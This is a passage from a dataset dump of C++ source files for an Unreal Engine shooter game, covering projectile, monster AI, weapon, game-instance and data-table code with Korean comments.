You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tProjectileMeshComponent = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"ProjectileMeshComponent\"));\n\tProjectileMeshComponent->SetupAttachment(CollisionComponent);\n\tProjectileMeshComponent->SetCollisionProfileName(TEXT(\"NoCollision\"));\n\n\t// 이 컴포넌트를 사용하여 이 프로젝타일의 무브먼트를 구동시킵니다.\n\tProjectileMovementComponent = CreateDefaultSubobject<UProjectileMovementComponent>(TEXT(\"ProjectileMovementComponent\"));\n\tProjectileMovementComponent->SetUpdatedComponent(CollisionComponent);\n\n\t// 객체에 충돌시 발생되는 피격 이펙트\n\tBurstingEffect = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"BurstingEffect\"));\n\tBurstingEffect->SetupAttachment(CollisionComponent);\n\tBurstingEffect->SetCollisionProfileName(TEXT(\"NoCollision\"));\n\tBurstingEffect->bAutoActivate = false;\n}\n\nvoid APG_ProjectileRifle::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tABCHECK(nullptr != ProjectileMovementComponent);\n\tProjectileMovementComponent->InitialSpeed = 0.0f;\n\tProjectileMovementComponent->MaxSpeed = 0.0f;\n\tProjectileMovementComponent->bRotationFollowsVelocity = true;\n\tProjectileMovementComponent->bShouldBounce = false;\n\tProjectileMovementComponent->Bounciness = 0.3f;\n\n\t// 플레이어 오버랩 이벤트 설정\n\tABCHECK(nullptr != CollisionComponent);\n\tCollisionComponent->SetGenerateOverlapEvents(true);\n\tCollisionComponent->OnComponentBeginOverlap.AddDynamic(this, &APG_ProjectileRifle::OnTargetBeginOverlap);\n\tCollisionComponent->OnComponentHit.AddDynamic(this, &APG_ProjectileRifle::OnTargetHit);\n\n\t// 총알 충돌 이펙트 설정\n\tABCHECK(nullptr != BurstingEffect);\n\tBurstingEffect->SetActive(false, true);\n\tBurstingEffect->OnSystemFinished.AddDynamic(this, &APG_ProjectileRifle::OnPlayEndParticle);\n}\n\n// Called when the game starts or when spawned\nvoid APG_ProjectileRifle::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\n// 프로젝타일의 속도를 발사 방향으로 초기화시키는 함수입니다.\nvoid APG_ProjectileRifle::FireInDirection(const FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon)\n{\n\tABCHECK(nullptr != ProjectileMovementComponent);\n\tWeaponData = *pWeaponData;\n\n\tProjectileMovementComponent->InitialSpeed = WeaponData.BulletSpeed;\n\tProjectileMovementComponent->MaxSpeed = WeaponData.BulletSpeed;\n\tProjectileMovementComponent->Velocity = ShootDirection * WeaponData.BulletSpeed;\n\n\t{\n\t\tFName CollisionName = bMonsterWeapon ? 
TEXT(\"Mon_Projectile\") : TEXT(\"Projectile\");\n\t\tif (CollisionComponent)\n\t\t\tCollisionComponent->SetCollisionProfileName(CollisionName);\n\n\t\t//if (ProjectileMeshComponent)\n\t\t//\tProjectileMeshComponent->SetCollisionProfileName(CollisionName);\n\n\t\t//if (BurstingEffect)\n\t\t//\tBurstingEffect->SetCollisionProfileName(CollisionName);\n\t}\n\n\tvStartPos = GetActorLocation();\n}\n\nvoid APG_ProjectileRifle::OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\tauto pOwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != pOwnerWeapon);\n\n\t// 몬스터 충돌시\n\tauto pMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (pMonCharacter && IsOwnerMyPlayer())\n\t\tpMonCharacter->OnDamage(pOwnerWeapon->GetWeaponAttackDamage());\n\n\t// 플레이어 충돌시\n\tauto pMyCharacter = Cast<APG_MyChar>(OtherActor);\n\tif (pMyCharacter && IsOwnerMonster())\n\t\tpMyCharacter->OnAttackedByMonster();\n\n\tif (BurstingEffect && false == BurstingEffect->IsActive())\n\t\tBurstingEffect->SetActive(true, true);\n\n\tif (WeaponData.Collide)\n\t{\n\t\tProjectileMovementComponent->StopMovementImmediately();\n\t\tProjectileMeshComponent->SetVisibility(false);\n\t\tCollisionComponent->SetCollisionEnabled(ECollisionEnabled::NoCollision);\n\t}\n}\n\nvoid APG_ProjectileRifle::OnTargetHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\tif (BurstingEffect && false == BurstingEffect->IsActive())\n\t\tBurstingEffect->SetActive(true, true);\n}\n\nvoid APG_ProjectileRifle::OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\tif (false == WeaponData.Collide)\n\t\treturn;\n\n\tDestroy();\n}\n" }, { "alpha_fraction": 0.7343173623085022, "alphanum_fraction": 0.7343173623085022, "avg_line_length": 19.325000762939453, "blob_id": "28b31473b5eba40862a48ff962cf90f6f832b7c8", "content_id": "50bdf45f428c6f8295ec77694716bff92fef61ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 881, "license_type": "no_license", "max_line_length": 79, "num_lines": 40, "path": "/Source/Project_Gun/Public/AI/PG_AICon_Mon.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <AIController.h>\n#include \"PG_AICon_Mon.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_AICon_Mon : public AAIController\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_AICon_Mon();\n\tvirtual void OnPossess(APawn* InPawn) override;\n\t//virtual void UnPossess() override;\n\n\tstatic const FName HomePosKey;\n\tstatic const FName TargetKey;\t\t// 캐릭터 타겟\n\tstatic const FName DetectRangeKey;\t// 몬스터가 캐릭터 인식하는 거리\n\tstatic const FName ChaseRangeKey;\t// 몬스터가 캐릭터 쫓아오는 최대 거리\n\n\tvirtual bool RunAI();\n\tvirtual void StopAI();\n\nprivate :\n\tbool SetBlackboardValue();\n\nprotected:\n\tUPROPERTY()\n\tclass UBehaviorTree* BTAsset = nullptr;\n\n\tUPROPERTY()\n\tclass UBlackboardData* BBAsset = nullptr;\n};\n" }, { "alpha_fraction": 0.7359667420387268, "alphanum_fraction": 0.7359667420387268, "avg_line_length": 17.5, "blob_id": "23cc0c4e186884fab0d7e156007726577dcbe871", "content_id": "15e5ca6aae4b2880fc8cf7eccf1f43c4d3f60342", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "C++", "length_bytes": 483, "license_type": "no_license", "max_line_length": 79, "num_lines": 26, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponRifle.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include \"PG_WeaponRifle.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponRifle : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_WeaponRifle();\n\t\n\tvirtual void PostInitializeComponents() override;\n\npublic :\n\tvirtual void Fire() override;\n\tvirtual void StopFire() override;\n};\n" }, { "alpha_fraction": 0.760617733001709, "alphanum_fraction": 0.760617733001709, "avg_line_length": 20.54166603088379, "blob_id": "9dd4e149065a446166c7a4ddd0832d42a6be4a6e", "content_id": "8583f7549090acca3b1f3893bfba0e00139093e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 520, "license_type": "no_license", "max_line_length": 79, "num_lines": 24, "path": "/Source/Project_Gun/Private/Character/PG_MonCharNormal.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharNormal.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\nAPG_MonCharNormal::APG_MonCharNormal()\n{\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n}\n\nvoid APG_MonCharNormal::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n}\n\nvoid APG_MonCharNormal::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterData = &MonsterNormalData;\n}\n\n" }, { "alpha_fraction": 0.7369632124900818, "alphanum_fraction": 0.7434815764427185, "avg_line_length": 22.495494842529297, "blob_id": "fb9065763c5efaf3657ab675c17c8a608630e25c", "content_id": "6b11df961ff5dd49807cbd7944bdd7ff3913489a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2710, "license_type": "no_license", "max_line_length": 99, "num_lines": 111, "path": "/Source/Project_Gun/Public/Game/GameInstance/PG_GameInstance.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Game/Console/PG_Console.h\"\n#include \"Game/AD/PG_ADData.h\"\n\n#include <Engine/DataTable.h>\n#include <Engine/GameInstance.h>\n#include <Engine/StreamableManager.h>\n#include \"PG_GameInstance.generated.h\"\n\n/**\n * \n */\n\nUCLASS()\nclass PROJECT_GUN_API UPG_GameInstance : public UGameInstance\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tUPG_GameInstance();\n\n\tvirtual void Init() override;\n\tvirtual void Shutdown() override;\n\n\t// From GameMode Tick()\n\tvoid FromGameModeTick(float DeltaTime);\n\n\npublic :\n\t//void StartGame_NextStage();\n\t//void RestartGame();\n\n\t//UFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\t//bool OnNextSelectStage();\n\t//UFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\t//bool OnPrevSelectStage();\n\t//UFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\t//bool SetPlayStageID(int32 nPlayStageID);\n\t//UFUNCTION(BlueprintCallable, Category = \"PG 
Stage\")\n\t//int32 GetPlayStageID()\t{ return PalyStageID; }\n\t//UFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\t//bool StartGame();\n\n\npublic :\n\t// 캐릭터\n\tFPGCharacterMovementData*\tGetTableCharacterMovementData();\n\tFPGCharacterCameraData*\t\tGetTableCharacterCameraData();\n\n\t// 무기 샵\n\tconst FPGWeaponTableData*\tGetWeaponTableData(int32 nIndex);\n\tconst bool\t\t\t\t\tGetAllWeaponTableData(OUT TArray<const FPGWeaponTableData*>& a_rkWeaponTableDatas);\n\n\t// 스테이지\n\tconst FPGStageData*\t\t\tGetTableStageData(int32 nID);\n\tconst bool\t\t\t\t\tGetAllTableStageData(OUT TArray<const FPGStageData*>& a_rkStageDatas);\n\n\t// 필살기\n\tconst FPGLethalAttackData*\tGetTableLethalAttackData(int32 nID);\n\n\t// 광고\n\tconst FPGADTableData*\t\tGetADTableData(EADType eADType);\n\tint32\t\t\t\t\t\tGetADRemainTime(EADType eADType);\n\tbool\t\t\t\t\t\tIsAbleADView(EADType eADType);\n\tvoid\t\t\t\t\t\tResetADRemainTime(EADType eADType);\n\n\t// 콘솔\n\tclass PG_Console*\t\t\tGetConsole()\t{ return &m_kConsole; }\n\nprivate :\n\tbool LoadTable();\n\tbool LoadConsoleCommand();\n\npublic :\n\tFStreamableManager StreamableManager;\n\n\t//int32 PalyStageID; // 첫번째 스테이지의 ID 값은 1부터 시작한다.\n\tFString GetStageName(int32 StageID);\n\nprivate :\n\t// 테이블 클래스 정리 필요..\n\tUPROPERTY()\n\tclass UDataTable* m_pCharacterMovementTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pCharacterCameraTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pWeaponTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pLethalAttackTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pStageTable = nullptr;\n\n\tUPROPERTY()\n\tclass UDataTable* m_pADTable = nullptr;\n\n\t// 콘솔 명령어\n\tclass PG_Console m_kConsole;\n\n\t// 광고\n\tclass PG_ADData m_kADData;\n\n\n};\n" }, { "alpha_fraction": 0.6530153751373291, "alphanum_fraction": 0.6688170433044434, "avg_line_length": 28.230932235717773, "blob_id": "c0212ed3193549b54e539e7ade55445ebf18abb0", "content_id": "948d7b6b3b76cd8d219a9df52bd194d77cc5a465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 16130, "license_type": "no_license", "max_line_length": 172, "num_lines": 472, "path": "/Source/Project_Gun/Public/Define/PG_TableData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Engine/DataTable.h>\n#include \"PG_TableData.generated.h\"\n\n#define PG_INVALID_INDEX\t\t-1\n#define PG_INFINITY_AMMO\t\t-1\t\t// 무한 총알\n#define PG_MAX_WEAPON_SLOT\t\t3\t\t// 무기 최대 장착 수\n#define PG_ADVIEW_REWARD\t\t3\t\t// 광고 보상 배수\n#define PG_ADVIEW_SHOP_REWARD\t200\t\t// 무기고에서 광고 보았을 때 보상 포인트\n\n//=========================================================================================\n// 캐릭터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGCharacterMovementData : public FTableRowBase\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGCharacterMovementData() : MaxSpeed(0.0f), AccelerationSpeed(0.0f), BodyRotateSpeed(0.0f)\n\t\t, AttackBodyRotateSpeed(0.0f), AttackUpperBodyRotateSpeed(0.0f)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tMaxSpeed;\t\t\t\t\t\t// 최대 이동속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tAccelerationSpeed;\t\t\t\t// 이동 가속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tBodyRotateSpeed;\t\t\t\t// 이동시 캐릭터 
회전속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tAttackBodyRotateSpeed;\t\t\t// 공격시 캐릭터 회전속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tAttackUpperBodyRotateSpeed;\t\t// 공격시 상체 회전속도\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGCharacterCameraData : public FTableRowBase\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGCharacterCameraData() : Pitch(-45.0f), Yaw(0.0f), Roll(0.0f), ArmLength(0.0f), Fov(0.0f), ScreenY(0.0f)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tPitch;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tYaw;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tRoll;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tArmLength;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tFov;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\tfloat\tScreenY;\n};\n\n//=========================================================================================\n// 몬스터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData() : ID(0), MHP(0), MSpeed(0.0f), MAcceleration(0.0f), MRotateSpeed(0.0f), MBodyScale(1.0f), MDetectRange(0), MChaseRange(0), MDropRate(0.0f), MCollide(true)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tID;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tMHP;\t\t\t\t// 몬스터 체력\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMSpeed;\t\t\t\t// 몬스터의 이동 속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMAcceleration;\t\t// 몬스터 이동 가속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMRotateSpeed;\t\t// 몬스터가 캐릭터를 바라보기 위해 몸을 돌리는 속도\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMBodyScale;\t\t\t// 몬스터의 체력에 따른 몸체의 크기\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tMDetectRange;\t\t// 몬스터가 플레이어 캐릭터를 인식하는 거리 (시야)\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tMChaseRange;\t\t// 몬스터가 플레이어 캐릭터를 쫓아오는 최대 거리\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat\tMDropRate;\t\t\t// 몬스터가 재화를 드랍하는 확률\n\n\t\t//UPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\t\t//enum\tMBeHit;\t\t\t\t// 몬스터가 피격당할 때 발생할 효과 (0 : 없음, 1: 피격 위치 기준 뒤로 30cm)\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tbool\tMCollide;\t\t\t// 몬스터가 몬스터끼리 충돌할지 말지 결정\n\n\t//UPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"Data\")\n\t//USkeletalMesh* MMeshPath;\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_Normal : public FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_Normal() : FPGMonsterData(){ }\n\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_SkillType : public FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_SkillType() : MWeaponCoolTime(0.0f), MDashReadyTime(0.0f), MDashCoolTime(0.0f), MDashMoveDistance(0.0f), MDashSpeed(0.0f),\n\t\tMDivisionCount(0), MDivisionAmount(0), MDivisionSpawnRange(0.0f), MRemainDivisionCount(0) { }\n\n\t//===========================================\n\t// Weapon\n\t//===========================================\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MWeaponCoolTime;\t\t// 스킬 타입 몬스터의 공격 시전 쿨타임(ms)\n\n\t//===========================================\n\t// Dash\n\t//===========================================\n\tUPROPERTY(EditAnyWhere, 
BlueprintReadWrite)\n\tfloat MDashReadyTime;\t\t// 대쉬 준비 시간\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDashCoolTime;\t\t// 대쉬 쿨타임\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDashMoveDistance;\t// 대쉬 이동거리\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDashSpeed;\t\t\t// 대쉬 속도\n\n\n\t//===========================================\n\t// Division\n\t//===========================================\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MDivisionCount;\t\t// 분화 몬스터의 분화 횟수. 횟수를 입력하면, 100에서 횟수+1을 나누어 해당 HP대역에 들어가면 몬스터가 분화한다.\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MDivisionAmount;\t\t// 생성될(분화) 몬스터 갯수. 해당 개수만큼 현재위치 앞쪽 50 거리로 시계방향 Rotate시켜 개수에 맞춰 생성각도를 360을 나눠 생성한다.\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDivisionSpawnRange;\t// 분화시 기준 몬스터에서 해당 범위만큼 떨어져서 생성된다.\n\n\tUPROPERTY(VisibleAnyWhere, BlueprintReadWrite)\n\tint32 MRemainDivisionCount;\t// 분화 몬스터의 남은 분화 횟수\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_Division : public FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_Division() : MDivisionCount(0), MDivisionAmount(0), MDivisionSpawnRange(0.0f), MRemainDivisionCount(0) { }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MDivisionCount;\t\t// 분화 몬스터의 분화 횟수. 횟수를 입력하면, 100에서 횟수+1을 나누어 해당 HP대역에 들어가면 몬스터가 분화한다.\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MDivisionAmount;\t\t// 생성될(분화) 몬스터 갯수. 해당 개수만큼 현재위치 앞쪽 50 거리로 시계방향 Rotate시켜 개수에 맞춰 생성각도를 360을 나눠 생성한다.\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tfloat MDivisionSpawnRange;\t// 분화시 기준 몬스터에서 해당 범위만큼 떨어져서 생성된다.\n\n\tUPROPERTY(VisibleAnyWhere, BlueprintReadWrite)\n\tint32 MRemainDivisionCount;\t// 분화 몬스터의 남은 분화 횟수\n};\n\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_DivisionSkillType : public FPGMonsterData_Division\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_DivisionSkillType() : MWeaponCoolTime(0), MAttackSpeed(0), MAttackMethod(0){ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MWeaponCoolTime;\t\t// 스킬 타입 몬스터의 공격 시전 쿨타임(ms)\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MAttackSpeed;\t\t\t// 스킬 타입 몬스터의 공격 시전 속도(ms)\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MAttackMethod;\t\t// 스킬 타입 몬스터의 공격 방식\t(Projectile의 경우 이곳에 Projectile 이펙트BP 삽입, 돌진의 경우 Decal 이펙트 삽입)\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGMonsterData_Boss : public FPGMonsterData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGMonsterData_Boss() { }\n\n};\n\n\n//=========================================================================================\n// 무기 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGWeaponData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGWeaponData() : Bullet(0), AttackRange(0), BulletRange(0), BulletSpeed(0), BPower(0), Collide(false), PowerUpPerLevelUp(0), MaxPower(0),\n\t\tMag(0), MagUpPerLevelUp(0),\tMaxMag(0), Vibration(0), VibrationCool(0), WPushRange(0)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tFString Name;\n\n\t// 발사체의 외관(Mesh/텍스처)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tTSubclassOf<class APG_Projectile> BProjectile;\n\t//TSubclassOf<class APG_Projectile> BProjectile;\n\n\t// 1회 발사할 때 발사체의 생성 개수. 해당 항목이 입력되면 아래 생성위치, \n\t// 발사각도가 각 발사체마다 입력되게 생긴다. 예를들어 Bullet에 3을 입력하면 아래로 BStartPosition, BAngle, BEffect가 3개씩 생긴다. 
\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32\tBullet;\t\t\n\n\t// 몬스터가 접근해왔을 때 공격하기 시작 하는 공격 범위.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 AttackRange;\n\n\t// 발사체가 도달하는 최대 범위. 이후 발사체는 무조건 소멸한다.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 BulletRange;\n\n\t// 총알 속도\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 BulletSpeed;\n\t\n\t// 발사체의 공격력.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 BPower;\n\t\n\t// 발사체가 몬스터를 관통할지 여부. (단, 오브젝트와 충돌할 경우 이 옵션에 영향을 받지 않고 무조건 소멸한다.)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tbool Collide;\n\n\t// 무기 공격력 업그레이드를 할 때 마다 올라가는 공격력 수치\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 PowerUpPerLevelUp;\n\n\t// 최대 무기 공격력 수치\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MaxPower;\n\n\t// 기본 탄창 수. (초기에 얻으면 설정되어 있는 기본 최대 탄창 수)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 Mag;\n\n\t// 상점에서 AMMO레벨업 할 때마다 올라가는 무기 최대 탄창 수.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MagUpPerLevelUp;\n\t\n\t// 최대 탄창 수. (성장으로 최대로 높힐 수 있는 최대 탄창 수)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 MaxMag;\n\n\t// 발사체가 몬스터 피격 시 기기에 주는 진동 강도.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 Vibration;\n\n\t// 진동이 울리는 주기(1초에 Int 회).\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 VibrationCool;\n\n\t// 몬스터 피격 시 몬스터가 후방으로 밀리는 범위(Cm)\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite)\n\tint32 WPushRange;\n};\n\n//=========================================================================================\n// 스테이지 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGStageData : public FTableRowBase\n{\n\tGENERATED_BODY()\npublic :\n\tFPGStageData(): M_Amount(0), Time(0), Multi_Kill(0), StageClearReward(0), StarReward(0)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tFString StageName;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 M_Amount;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 Time;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 Multi_Kill;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 StageClearReward;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 StarReward;\n};\n\n//=========================================================================================\n// 스킬 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGLethalAttackData : public FTableRowBase\n{\n\tGENERATED_BODY()\n\n\tpublic:\n\tFPGLethalAttackData() : LMinPoint(0), LMaxPoint(0), LMinRange(0), LMaxRange(0), LPower(0), LEffectDuration(0), Vibration(0), VibrationCool(0)\n\t{ }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tFString Name;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tTSubclassOf<class APG_LethalAttack> BLethalAttack;\n\n\t// 필살기 사용에 필요한 최소 몬스터 킬 수치.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LMinPoint;\n\n\t// 필살기 사용에 쓸 수 있는 최대 몬스터 킬 수치.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LMaxPoint;\n\n\t// 필살기가 펼쳐질 수 있는 최소 타격 범위.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LMinRange;\n\n\t// 필살기가 펼쳐질 수 있는 최대 타격 범위.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category 
= \"PG Data\")\n\tint32 LMaxRange;\n\n\t// 필살기의 공격력\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LPower;\n\n\t// 필살기 효과의 지속 시간.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 LEffectDuration;\n\n\t// 발사체가 몬스터 피격 시 기기에 주는 진동 강도.\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 Vibration;\n\n\t// 진동이 울리는 주기(1초에 Int 회).\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tint32 VibrationCool;\n};\n\n//=========================================================================================\n// Weapon Shop 데이터\n//=========================================================================================\nUENUM()\nenum class EBuyType : int32\n{\n\teBT_Weapon = 0,\n\teBT_Power,\n\teBT_Ammo,\n\teBT_Max,\n};\n\nUSTRUCT(BlueprintType)\nstruct FPGWeaponTableData : public FTableRowBase\n{\n\tGENERATED_BODY()\npublic:\n\tFPGWeaponTableData() : ServiceOpen(false), MontageFireReaction(nullptr), CostUnlock(0), CostUpgradePower(0), CostUpgradeAmmo(0) { }\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tTSubclassOf<class APG_Weapon> BPWeapon;\n\n\tUPROPERTY(EditAnyWhere, BlueprintReadWrite, Category = \"PG Data\")\n\tbool 